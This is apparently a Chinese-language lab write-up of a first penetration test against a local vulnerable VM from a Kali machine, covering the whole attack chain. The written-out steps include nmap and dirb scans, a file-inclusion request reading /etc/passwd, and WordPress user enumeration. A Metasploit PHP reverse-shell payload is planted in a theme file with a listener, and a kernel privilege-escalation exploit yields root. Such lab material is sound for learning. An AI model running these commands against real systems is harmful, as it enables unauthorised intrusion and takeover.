我的第一次...

       
-------------已经到底啦!-------------
 

第一次都有点不熟练,以后一定多练几次

打开这次环境需要的漏洞靶机,并且再开一台kali攻击机,这里我用xshell连接

在这里我们可以用nmap来扫描电脑开放的网段。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统,129是我kali的ip,推断130那个就是靶机ip了

1
nmap -sP 192.168.204.0/24

排除掉一些特别大或特别小的子网,最终还剩下两个选择,在vmware的网络适配器里找到靶机的对应的MAC地址就可

那么我们这里靶机的IP就是192.168.204.130

通过这条ip我们可以查询该靶机上现在在运行哪些软件,

用扫描器扫端口,冲他。

通过端口号我们就可以对应查询到该服务器目前执行着哪些协议

Nmap不仅可以告知端口还有端口运行的协议、版本

下面便是我们扫出来的结果

1
nmap -p 1-65535 -A 192.168.204.130

接下来就该考虑从哪个端口入手了,http or ssh?

我们先去浏览器看一下这个ip吧

啥也不是..

那么只能扫一下目录康康囖

1
dirb http://192.168.204.130/

扫描结果有15个可以利用的

每个都尝试了一下发现都没有什么突破的地方,倒是扫出来不少wordpress

那么就具体一点,直接指定后缀关键字搜索

1
dirb http://192.168.204.130/ -X .txt,.php,.zip

挨个查看,下一步提示出来啦。看来方向在http这里没错的

secre.txt里有线索

1
curl http://192.168.204.130/secret.txt

第一次fuzz出来都是没用的东西,那么第二次还是采用过滤吧

在fuzz里–hw(–hc –hl)都是把固定的位数隐藏起来,这也就直接过滤掉了12位的word

把这个参数file和之前给的location.txt拼接起来

1
http://192.168.204.130/index.php?file=location.txt

提示让我们在另一个php里面寻找答案且参数给定”secrettier360”。那么除了index.php,我们还剩下image.php

1
访问 http://192.168.204.130/image.php?secrettier360=/etc/passwd

结果提示应该在/home/saket 中寻找password.txt

我猜是ubuntu的登陆密码

然鹅不是。。

但是我们之前还扫出来一个wordress的网站,并且他还是有登陆界面的,那么这串字符会不会是博客的账户密码呢?

试试看

1
wpscan --url http://192.168.204.130/wordpress/ --enumerate u

得到账户用户名 victor

用前面得到的密码我们进入网站

在可编辑的项目栏找到可以操作的php,就是这了。

接下来一步就是上传指令进行提权了,一句话木马、反弹链接、msf都可以,我个人是认为最好用msf的,因为一句话木马存在一些不可预测的限制,有时候就比如服务器ip可能会改变,用菜刀啥的就连不上,有时反弹链接要比一句话木马主动连接要更好一点。

这里我就采用msf生成php的反弹链接的代码去监听了

生成一个shell.php

在新开一个窗口,用msfconsole去启动监听

运行监听模块

去获取shell.php

然后粘贴到wordpress的secret.php编辑栏里

上传代码,通过浏览器运行链接成功

监听配置完成

1
use exploit/multi/handler
1
set payload php/meterpreter/reverse_tcp
1
set lhost 192.168.204.129
1
set port 4444
1
exploit

sudo -i(排除)

history

/ find

操作系统内核漏洞 —

已经知道内核版本是多少了,显而易见这是值得尝试的一条线

还是照例打开msfconsole

然后查找有关该版本号的ubuntu漏洞

扫出来一条小于4.13的版本并且是个存在提权的漏洞,后面的c文件是个已经写好的脚本,直接拿来用就好,不跟你嘻嘻哈哈

找到后拿出来编译一下传到靶机上去

传上去之后shell开始,发现操作权限不够我们首先要增加可执行权限

查看目录找到root的文件

cat 打开是一串哈希值,解不出来。看来是登陆不进去了,不过我们都获得root权限,也无所谓了

至于key.txt什么的,随他们去吧。。

一次小小渗透就算完成了,还是翻阅查找了不少东西的,在此感谢。